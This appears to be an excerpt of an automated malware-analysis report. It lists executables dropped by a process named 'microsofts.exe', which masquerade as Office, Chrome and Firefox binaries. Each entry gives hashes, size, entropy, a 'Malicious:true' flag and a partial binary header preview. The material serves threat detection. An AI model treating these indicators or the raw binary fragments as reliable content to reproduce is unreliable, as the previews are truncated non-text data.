                                                                                                                                                                                                                                                                                                          SSDEEP:24576:IfrYY42wd7hlOw9fpkEE64vsqjnhMgeiCl7G0nehbGZpbD:Fz9xrSTDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:81A4FFFF31611F07CF9079B11B4721BE
                                                                                                                                                                                                                                                                                                          SHA1:9F42CE01B00DE4F56395670BFAEC244E3ACD8C48
                                                                                                                                                                                                                                                                                                          SHA-256:907AAE1FAE64E1C66A0DCB9DF484994230EE7CCF5034163F1855F5EF71575A2B
                                                                                                                                                                                                                                                                                                          SHA-512:EAC19D10B49DC2589C7607915DEAEA0C6187BF114A77F2C8789468412E8625F0714E97D0783E918FB9E56F64A7247E0260146E3DA2F4112BCBF29C72F176269D
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. ............ ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1388544
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.272929616101656
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:OwkNKiZ+R2GGNUbTF5YXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/T:OzNKUE5YsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:4E7D5F5AFBA85853B444D293F6B56981
                                                                                                                                                                                                                                                                                                          SHA1:30F8B23007153188638099E5266347588AE61B1F
                                                                                                                                                                                                                                                                                                          SHA-256:909CCF2381A2D809EEC40E81BD513399D563032A89C6D7B8A1673367C4449469
                                                                                                                                                                                                                                                                                                          SHA-512:1D0222984F8A5FD844AB0DF17F9E5184BA6C0B4F20BF90E5612BD978C841439BC8E2B92599772383203FCC662D7AA6819BFACC7B3EE52AEE8EEBEA5F965D0CD6
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................P............ .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):5855744
                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.574321947166506
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:98304:7ALuzDKnxCp3JKNrPJzruaI6HMaJTtGbFD527BWG:caGg3cFPIaI6HMaJTtGbFVQBWG
                                                                                                                                                                                                                                                                                                          MD5:58D91A7683A5B595C621C732605EFB6B
                                                                                                                                                                                                                                                                                                          SHA1:97209B655AA88311CF45774D056E98DA8929ED29
                                                                                                                                                                                                                                                                                                          SHA-256:BAA60EE69FF387DB65F75E9032CD968B1218A04EDD3EDE3782437F894FC34E0C
                                                                                                                                                                                                                                                                                                          SHA-512:B620754C8196ED482863351E05BF8B5B8D7B942F8D0EF1397CA21F043B920ADA32A7B17AE6DE190FED20DCEB0DF375059AB92F3ED622976401DDB59E58636BBB
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y......Y... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1312768
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.356048924270396
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:SXr/SVMxWLsqjnhMgeiCl7G0nehbGZpbD:K1x+Dmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:6CF50C9A5EB19C2B73D5D1034B2E177F
                                                                                                                                                                                                                                                                                                          SHA1:30BBF9822FF8EAFE9D70563AC6FB0EDC6EF9CAB8
                                                                                                                                                                                                                                                                                                          SHA-256:493A8F50ED1C3E48397AF86B0E53255524F303662C8EC29CB98DB01E4925F7EC
                                                                                                                                                                                                                                                                                                          SHA-512:332276EC2476414B6388C242AAA43CBF3D9BE30EA5F39115AC6D1048FEF985D608E8B5E4EDF9C39EBCF893A8CB320551A707E15E00A6EB6CCAA8114DD2C500B9
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................P................... ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc...p.......`..................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):27533312
                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.24863573148766
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:196608:EhRrmpGpGdJM7Hbp8JfrCGvqYYuNDmoefAlprtPz25HqaI6HMaJTtGbQOZVQBWG:EhRCpGpMJMrbp8JjpNdNlc57B
                                                                                                                                                                                                                                                                                                          MD5:DD22339E4E2C4B7CE2D26BBB76A2A652
                                                                                                                                                                                                                                                                                                          SHA1:19AAEB256553DD91DB1B301548CA94E8BE38B713
                                                                                                                                                                                                                                                                                                          SHA-256:DC331157005B091F2CCC2A3276AF37F38CD5D1EA9D721E3C64F46755F2E7D8D1
                                                                                                                                                                                                                                                                                                          SHA-512:2184A2D66DF764248D78828BC63935F4F3E25536F22F33AE3B8653BD3547EF889F117BC12A1C1B311563B087DE6E3FFD70A85D1C94F96194A08F39B92AAF0FC9
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@.......................................... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):2199552
                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.789002477325301
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:h83pZ3kd0CuEeN0LUmRXzYs65mxDmg27RnWGj:JKuUQY15yD527BWG
                                                                                                                                                                                                                                                                                                          MD5:C08BF75AAED9A03556E5C74639D923E8
                                                                                                                                                                                                                                                                                                          SHA1:54DCB32E53F81D6814FB6A926F31914906884BDC
                                                                                                                                                                                                                                                                                                          SHA-256:4AC0410F805846FB8426A5E62D6F27EB20F633A9130456DF314DC6E339A10E3B
                                                                                                                                                                                                                                                                                                          SHA-512:59EF7D65E7B51E85C489E190A6C9A05D7A9C8F6B6031F526BEAEEBD339CA34D049FDCC2AEC9B353E511BB148A54FAD884F6E9DD84727CF547BF96598D56F9C2B
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!......."... .......... ......................................P...|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):4971008
                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.670828920786754
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:AErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGOpndOPcptz6+Ms:WA4oGlcR+glEdOPKzgVZfD527BWG
                                                                                                                                                                                                                                                                                                          MD5:1EAB154180792C6EA5DDA6BF72150468
                                                                                                                                                                                                                                                                                                          SHA1:BC317046F09743C7CFA7FF3939244C9A79EBCF51
                                                                                                                                                                                                                                                                                                          SHA-256:3A9A6E4716EF14D4E25508A3E7910B516CF1C9AE0E01B856AFF5B16848864A38
                                                                                                                                                                                                                                                                                                          SHA-512:68DC3052026EDE828E076C9E65E6D0FF12D0F419B52D8FE2AA4EFD7C1CE5761A366BEB1C49FBD33DD2AF1CFA048E5CE854DC8B5B11491FB9263C2EE4862DE3EB
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L.......L... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):4897792
                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.8297581052184855
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:f8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKX:uv2gM+qwXLg7pPgw/DSZHBD527BWG
                                                                                                                                                                                                                                                                                                          MD5:85F786ECE93BE42A646D36C3997994CC
                                                                                                                                                                                                                                                                                                          SHA1:1927422BEF97C65CFE5A1C9C8DE296BFF04D942D
                                                                                                                                                                                                                                                                                                          SHA-256:45FA1F0A56D88F72CEC7FC1D9D067F8A50FE6B801669230F21CA8F73E77C763D
                                                                                                                                                                                                                                                                                                          SHA-512:B57A8173E73C7A3C4EFD87E89E4ACA433AA8AFDD5A9B7A97DC369151568019EC821EF65B0E59E4265244EAF0C601061F026E3AF2DAE0AC327C62FBA81390BB7C
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L......tK... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):4897792
                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.829758227709845
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:G8ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKX:Fv2gM+qwXLg7pPgw/DSZHBD527BWG
                                                                                                                                                                                                                                                                                                          MD5:EA627F6D1152BE753F79000FD5E97F70
                                                                                                                                                                                                                                                                                                          SHA1:D6D09B96E2020A32FAED68FAAE14EBF202BA36A2
                                                                                                                                                                                                                                                                                                          SHA-256:ABDA46CD1F64781B6D050EF7071CA7E697891220E6A3F30CA486E73C5CE843D8
                                                                                                                                                                                                                                                                                                          SHA-512:39DAC1A2F4AB91F3F1BA708DF1EF43CA61F0B0805C65C383D4EB2AD6E83A963C1CCCEF53B5FBC2BC7680458BA4E929CD7DF494C61956C426CCD3B24A694D5C7F
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.......J... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):2156544
                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.953556706948554
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:8tjqL8fH+8aUbp8D/8+xyWAGsqjnhMgeiCl7G0nehbGZpbD:4jKK+81FI/8z4Dmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:488424D4723D4E1B4D173DCCF31C79FD
                                                                                                                                                                                                                                                                                                          SHA1:B604CB7C722219E57CBF0B21C0516C84A2E22FA3
                                                                                                                                                                                                                                                                                                          SHA-256:41AE5B7789B780672A3EF873C64BF7C77137711AAB7B53AE63B525D0CDB112DB
                                                                                                                                                                                                                                                                                                          SHA-512:A153559FCC92762C624AE0820E993A1F5FAA67425D2EA640C50303227250BA9657BCF07DC7BD03153A36617D26E95DA1DDD9720E1D0451BD47A6C0964F254D99
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......F.....................@.............................P".......!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):2370560
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.032366330447843
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:KAMsOu3JfCIGnZuTodRFYKBrFDbWpaDmg27RnWGj:KAMa38ZuTSfD527BWG
                                                                                                                                                                                                                                                                                                          MD5:F90E911CD27118F83D33FA418E4A4993
                                                                                                                                                                                                                                                                                                          SHA1:90A5514B81DD5E111DEE258689F36BB9674F9AC2
                                                                                                                                                                                                                                                                                                          SHA-256:938D3B818AD22CDAC2CEF54F8E513F7DED09D836F94677482FD6018D00A99B1F
                                                                                                                                                                                                                                                                                                          SHA-512:BF359EECF673010BB5F897EB7F73FEC4F507EF99ACE8CA99DBD72949F22B661CE257264E519F4C63B07E52F62864E6AF0063A3B1F21D304596B6C6F2C1D8CF0F
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e..........".................0..........@..............................%......I$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1984512
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.10431876354382
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:YwbK7tnhD4aH6wD2Krx5NgOOagQE8JasqjnhMgeiCl7G0nehbGZpbD:YSK7Fhslq2EPfOGEDDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:299EDED21839276421A1362259ECA51D
                                                                                                                                                                                                                                                                                                          SHA1:E32CE32F9291D2B8CED2BD0A90E6145F11C3C997
                                                                                                                                                                                                                                                                                                          SHA-256:795046E3B391A6CBEE39F196EF8BFD919413D9106E16E12CDBFE069CEF1F5FC3
                                                                                                                                                                                                                                                                                                          SHA-512:16EE88274667576B2F01A8A4F0B32E5D3DB9A9E6BE5FE2BD4C32BF41C26BFE1BD21297F2FEFA697025F8E86D05E502AD03C3DFEEE36771D3FF4475B4974EB4F5
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."............................@.......................................... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Google\Chrome\Application\chrome_proxy.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1779712
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.158042961213183
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:FKI7Twj5KDHxJ1FxyD+/wsG18bbQqsqjnhMgeiCl7G0nehbGZpbD:Fv7e0j31mD+/wDGb9Dmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:E3B8095EED961294DFC81E1D15C8ADCD
                                                                                                                                                                                                                                                                                                          SHA1:0AE9B3AD57C90FBE655B31BB3645087C58EBEC81
                                                                                                                                                                                                                                                                                                          SHA-256:7FCC6ECFF64AA38194FC7720F9C3C18E4F739D50F557317BF5CB008499AA625C
                                                                                                                                                                                                                                                                                                          SHA-512:DFB1351B450011AB3E49105FECF3A4D3B0843D88FDA21E86345510E2CB5749BE8C8D743C1C25D17F71D14BB5169AC52548B6FA8592785C47DBA6B914F6A423AD
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."..........B.................@.......................................... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).......*..................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.......*..............@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Mozilla Firefox\crashreporter.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1378304
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.37742148672151
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:EQUVPDHhSNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:/yhSNsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:4AD70F1D2A14193E45BBB76620D9D3BE
                                                                                                                                                                                                                                                                                                          SHA1:678EBA52F69D8131B680C1D7254C1D728C280231
                                                                                                                                                                                                                                                                                                          SHA-256:25710DF98672F723CC8D5B146BAECE8B00D768DAD4965462E4BC5C29C717701D
                                                                                                                                                                                                                                                                                                          SHA-512:42037364325DD550DA2216B6E677C78C1E32EF2DE71AC99E3266B423367C04126DD43D582AFEAD4487B434AA7355E57768D4290B06F422319AC5813C126DC01A
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.............................p......C..... ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Mozilla Firefox\default-browser-agent.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1286656
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.222098544995581
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:xsFfc1VyFn5UQn652bO4HisqjnhMgeiCl7G0nehbGZpbD:xsFcIn5rJMDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:F402C092103117332D1BF7E494328F9E
                                                                                                                                                                                                                                                                                                          SHA1:C6F62192BC38EC47949C1CF5BCB52C2CF7006328
                                                                                                                                                                                                                                                                                                          SHA-256:6173212ADA1EF02A128075CEBC0ECF84F4A352D107A4B1324A334D714542C7BB
                                                                                                                                                                                                                                                                                                          SHA-512:F739364C076E4DA8C55AF160102EE6967F4D1FD7864BC880B20CEB35425CC19106A5C431F6F6EFA3B50CD3FB08FF2A6325ECEB7D522B545823C3260E9840E275
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
